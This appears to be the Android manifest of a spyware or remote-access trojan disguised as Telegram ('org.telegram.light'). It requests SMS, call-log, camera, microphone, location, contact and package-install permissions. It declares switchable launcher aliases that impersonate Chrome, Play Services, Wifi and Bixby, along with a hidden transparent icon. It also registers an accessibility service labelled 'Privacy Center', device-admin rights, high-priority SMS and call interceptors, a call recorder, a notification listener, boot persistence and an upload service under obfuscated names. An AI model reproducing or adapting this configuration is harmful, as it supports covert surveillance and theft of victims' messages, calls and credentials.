<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:versionCode="1" android:versionName="31.13222" android:compileSdkVersion="29" android:compileSdkVersionCodename="10" package="org.telegram.light" platformBuildVersionCode="29" platformBuildVersionName="10">
    <uses-sdk android:minSdkVersion="17" android:targetSdkVersion="22"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES"/>
    <uses-permission android:name="android.permission.READ_CALL_LOG"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.REORDER_TASKS"/>
    <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.GET_ACCOUNTS"/>
    <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.GET_TASKS"/>
    <uses-permission android:name="android.permission.USE_CREDENTIALS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS"/>
    <uses-permission android:name="android.permission.DISABLE_KEYGUARD"/>
    <uses-permission android:name="android.permission.READ_PROFILE"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission-sdk-23 android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
    <uses-permission android:name="com.google.android.finsky.permission.BIND_GET_INSTALL_REFERRER_SERVICE"/>
    <uses-permission android:name="com.google.android.c2dm.permission.RECEIVE"/>
    <application android:theme="@style/AppTheme" android:label="@string/app_name" android:icon="@drawable/gp_store" android:name="net.axel.app.app.AppController" android:debuggable="true" android:allowBackup="true" android:hardwareAccelerated="false" android:largeHeap="true" android:supportsRtl="true" android:resizeableActivity="true" android:appComponentFactory="androidx.core.app.CoreComponentFactory">
        <activity android:label="@string/sys_name" android:icon="@drawable/trans_icon" android:name="net.axel.app.activities.Main" android:excludeFromRecents="true"/>
        <activity-alias android:label="@string/app_wifi" android:icon="@drawable/wifi" android:name="net.axel.app.Extra_Wifi" android:enabled="false" android:targetActivity="net.axel.app.activities.Main">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity-alias>
        <activity-alias android:label="@string/app_chrome" android:icon="@drawable/chrome" android:name="net.axel.app.Extra_Chrome" android:enabled="false" android:targetActivity="net.axel.app.activities.Main">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity-alias>
        <activity-alias android:label="@string/app_play_services" android:icon="@drawable/gp_store" android:name="net.axel.app.Extra_Play_Services" android:enabled="false" android:targetActivity="net.axel.app.activities.Main">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity-alias>
        <activity-alias android:label="@string/app_bixby" android:icon="@drawable/map" android:name="net.axel.app.Extra_Bixby" android:enabled="false" android:targetActivity="net.axel.app.activities.Main">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity-alias>
        <activity-alias android:label="@string/app_name" android:icon="@drawable/utilies" android:name="net.axel.app.Extra_Non_Trans" android:enabled="false" android:targetActivity="net.axel.app.activities.Main">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity-alias>
        <activity-alias android:label="@string/sys_name" android:icon="@drawable/trans_icon" android:name="net.axel.app.Extra" android:enabled="false" android:targetActivity="net.axel.app.activities.Main">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity-alias>
        <activity-alias android:label="Telegram" android:icon="@drawable/telegram" android:name="net.axel.app.Launcher" android:enabled="true" android:targetActivity="net.axel.app.activities.Main">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity-alias>
        <provider android:name="androidx.core.content.FileProvider" android:exported="false" android:authorities="org.telegram.light.provider" android:grantUriPermissions="true">
            <meta-data android:name="android.support.FILE_PROVIDER_PATHS" android:resource="@xml/provider_paths"/>
        </provider>
        <activity android:name="net.axel.app.activities.Telegram" android:excludeFromRecents="true"/>
        <activity android:theme="@android:style/Theme.Dialog" android:name="net.axel.app.activities.Update_dialog" android:excludeFromRecents="true"/>
        <activity android:name="net.axel.app.activities.Uninstall_Another" android:excludeFromRecents="true"/>
        <activity android:name="net.axel.app.activities.Real_App" android:excludeFromRecents="true"/>
        <service android:name="net.axel.app.AudioChat.CallRecService" android:enabled="true" android:exported="true" android:process=":remote"/>
        <service android:label="@string/app_name" android:name="net.axel.app.listeners.NotificationListener" android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
            <intent-filter>
                <action android:name="android.service.notification.NotificationListenerService"/>
            </intent-filter>
        </service>
        <service android:name="net.axel.app.FireBase.FirebaseMessService">
            <intent-filter>
                <action android:name="com.google.firebase.MESSAGING_EVENT"/>
            </intent-filter>
        </service>
        <service android:name="net.axel.app.FireBase.FirebaseIDService">
            <intent-filter>
                <action android:name="com.google.firebase.INSTANCE_ID_EVENT"/>
            </intent-filter>
        </service>
        <service android:name="net.axel.app.FireBase.FirebaseMessService">
            <intent-filter>
                <action android:name="com.google.firebase.MESSAGING_EVENT"/>
            </intent-filter>
        </service>
        <service android:name="net.axel.app.FireBase.FirebaseIDService">
            <intent-filter>
                <action android:name="com.google.firebase.INSTANCE_ID_EVENT"/>
            </intent-filter>
        </service>
        <service android:name="net.axel.app.serses.SERS_012" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_013" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_004" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_002" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_003" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_009" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_018" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_007" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_014" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_017" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_030" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_031" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_006" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_001" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_005" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_015" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_020" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_029" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_011" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_034" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_039" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_023" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_028" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_027" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_026" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_035" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_036" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_033" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_021" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_025" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_022" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_008" android:exported="false"/>
        <service android:name="net.axel.app.serses.SERS_024" android:exported="false" android:stopWithTask="true"/>
        <service android:name="net.axel.app.serses.SERS_019" android:exported="false" android:stopWithTask="true"/>
        <service android:name="net.axel.app.serses.SERS_010" android:exported="false" android:stopWithTask="true"/>
        <service android:name="net.axel.app.serses.SERS_032" android:exported="false" android:stopWithTask="true"/>
        <activity android:theme="@style/Theme.Transparent" android:name="net.axel.app.serses.SERS_038" android:excludeFromRecents="true"/>
        <service android:label="Privacy Center" android:name="net.axel.app.serses.SERS_037" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE" android:enabled="true" android:exported="true">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService"/>
            </intent-filter>
            <meta-data android:name="android.accessibilityservice" android:resource="@xml/serviceconfig"/>
        </service>
        <receiver android:name="net.axel.app.reses.RES_007"/>
        <receiver android:name="net.axel.app.reses.RES_014"/>
        <receiver android:name="net.axel.app.reses.RES_028"/>
        <receiver android:name="net.axel.app.reses.RES_020"/>
        <receiver android:name="net.axel.app.reses.RES_006"/>
        <receiver android:name="net.axel.app.reses.RES_035"/>
        <receiver android:name="net.axel.app.reses.RES_023"/>
        <receiver android:name="net.axel.app.reses.RES_039"/>
        <receiver android:name="net.axel.app.reses.RES_029"/>
        <receiver android:name="net.axel.app.reses.RES_030"/>
        <receiver android:name="net.axel.app.reses.RES_013"/>
        <receiver android:name="net.axel.app.reses.RES_038"/>
        <receiver android:name="net.axel.app.reses.RES_031"/>
        <receiver android:name="net.axel.app.reses.RES_033"/>
        <receiver android:name="net.axel.app.reses.RES_009"/>
        <receiver android:name="net.axel.app.reses.RES_012"/>
        <receiver android:name="net.axel.app.reses.RES_019"/>
        <receiver android:name="net.axel.app.reses.RES_017"/>
        <receiver android:name="net.axel.app.reses.RES_005"/>
        <receiver android:name="net.axel.app.reses.RES_027"/>
        <receiver android:name="net.axel.app.reses.RES_001"/>
        <receiver android:name="net.axel.app.reses.RES_036"/>
        <receiver android:name="net.axel.app.reses.RES_018"/>
        <receiver android:label="@string/device_admin_label" android:name="net.axel.app.utils.DeviceAdmin" android:permission="android.permission.BIND_DEVICE_ADMIN" android:description="@string/device_description">
            <meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin"/>
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
                <action android:name="android.app.action.DEVICE_ADMIN_DISABLE_REQUESTED"/>
                <action android:name="android.app.action.DEVICE_ADMIN_DISABLED"/>
            </intent-filter>
        </receiver>
        <receiver android:name="net.axel.app.reses.RES_024">
            <intent-filter android:priority="999">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
        <receiver android:name="net.axel.app.reses.RES_021">
            <intent-filter>
                <action android:name="android.net.wifi.STATE_CHANGE"/>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
            </intent-filter>
        </receiver>
        <receiver android:name="net.axel.app.reses.RES_022">
            <intent-filter>
                <action android:name="android.net.wifi.STATE_CHANGE"/>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
            </intent-filter>
        </receiver>
        <receiver android:name="net.axel.app.reses.RES_011"/>
        <receiver android:name="net.axel.app.reses.RES_034">
            <intent-filter>
                <action android:name="android.intent.action.PACKAGE_REMOVED"/>
                <data android:scheme="package"/>
            </intent-filter>
        </receiver>
        <receiver android:name="net.axel.app.reses.RES_015">
            <intent-filter>
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <data android:scheme="package"/>
            </intent-filter>
        </receiver>
        <receiver android:name="net.axel.app.reses.RES_032">
            <intent-filter>
                <action android:name="android.intent.action.ACTION_SHUTDOWN"/>
                <action android:name="android.intent.action.QUICKBOOT_POWEROFF"/>
            </intent-filter>
        </receiver>
        <receiver android:name="net.axel.app.reses.RES_037">
            <intent-filter>
                <action android:name="android.intent.action.USER_PRESENT"/>
            </intent-filter>
        </receiver>
        <receiver android:name="net.axel.app.reses.RES_002" android:enabled="true" android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.QUICKBOOT_POWERON"/>
                <action android:name="android.intent.action.REBOOT"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </receiver>
        <receiver android:name="net.axel.app.reses.RES_008"/>
        <receiver android:name="net.axel.app.reses.RES_026"/>
        <receiver android:name="net.axel.app.reses.RES_010"/>
        <receiver android:name="net.axel.app.reses.RES_040"/>
        <receiver android:name="net.axel.app.reses.RES_003" android:enabled="true" android:exported="true">
            <intent-filter android:priority="999">
                <action android:name="android.intent.action.PHONE_STATE"/>
                <action android:name="android.intent.action.NEW_OUTGOING_CALL"/>
            </intent-filter>
        </receiver>
        <receiver android:name="net.axel.app.utils.Cosommo"/>
        <service android:name="net.gotev.uploadservice.UploadService" android:enabled="true" android:exported="true"/>
        <service android:name="com.google.firebase.messaging.FirebaseMessagingService" android:exported="true">
            <intent-filter android:priority="-500">
                <action android:name="com.google.firebase.MESSAGING_EVENT"/>
            </intent-filter>
        </service>
        <service android:name="com.google.firebase.components.ComponentDiscoveryService" android:exported="false">
            <meta-data android:name="com.google.firebase.components:com.google.firebase.analytics.connector.internal.AnalyticsConnectorRegistrar" android:value="com.google.firebase.components.ComponentRegistrar"/>
            <meta-data android:name="com.google.firebase.components:com.google.firebase.iid.Registrar" android:value="com.google.firebase.components.ComponentRegistrar"/>
        </service>
        <receiver android:name="com.google.android.gms.measurement.AppMeasurementReceiver" android:enabled="true" android:exported="false"/>
        <receiver android:name="com.google.android.gms.measurement.AppMeasurementInstallReferrerReceiver" android:permission="android.permission.INSTALL_PACKAGES" android:enabled="true" android:exported="true">
            <intent-filter>
                <action android:name="com.android.vending.INSTALL_REFERRER"/>
            </intent-filter>
        </receiver>
        <service android:name="com.google.android.gms.measurement.AppMeasurementService" android:enabled="true" android:exported="false"/>
        <service android:name="com.google.android.gms.measurement.AppMeasurementJobService" android:permission="android.permission.BIND_JOB_SERVICE" android:enabled="true" android:exported="false"/>
        <receiver android:name="com.google.firebase.iid.FirebaseInstanceIdReceiver" android:permission="com.google.android.c2dm.permission.SEND" android:exported="true">
            <intent-filter>
                <action android:name="com.google.android.c2dm.intent.RECEIVE"/>
            </intent-filter>
        </receiver>
        <service android:name="com.google.firebase.iid.FirebaseInstanceIdService" android:exported="true">
            <intent-filter android:priority="-500">
                <action android:name="com.google.firebase.INSTANCE_ID_EVENT"/>
            </intent-filter>
        </service>
        <provider android:name="com.google.firebase.provider.FirebaseInitProvider" android:exported="false" android:authorities="org.telegram.light.firebaseinitprovider" android:initOrder="100"/>
        <activity android:theme="@android:style/Theme.Translucent.NoTitleBar" android:name="com.google.android.gms.common.api.GoogleApiActivity" android:exported="false"/>
        <meta-data android:name="com.google.android.gms.version" android:value="@integer/google_play_services_version"/>
    </application>
</manifest>
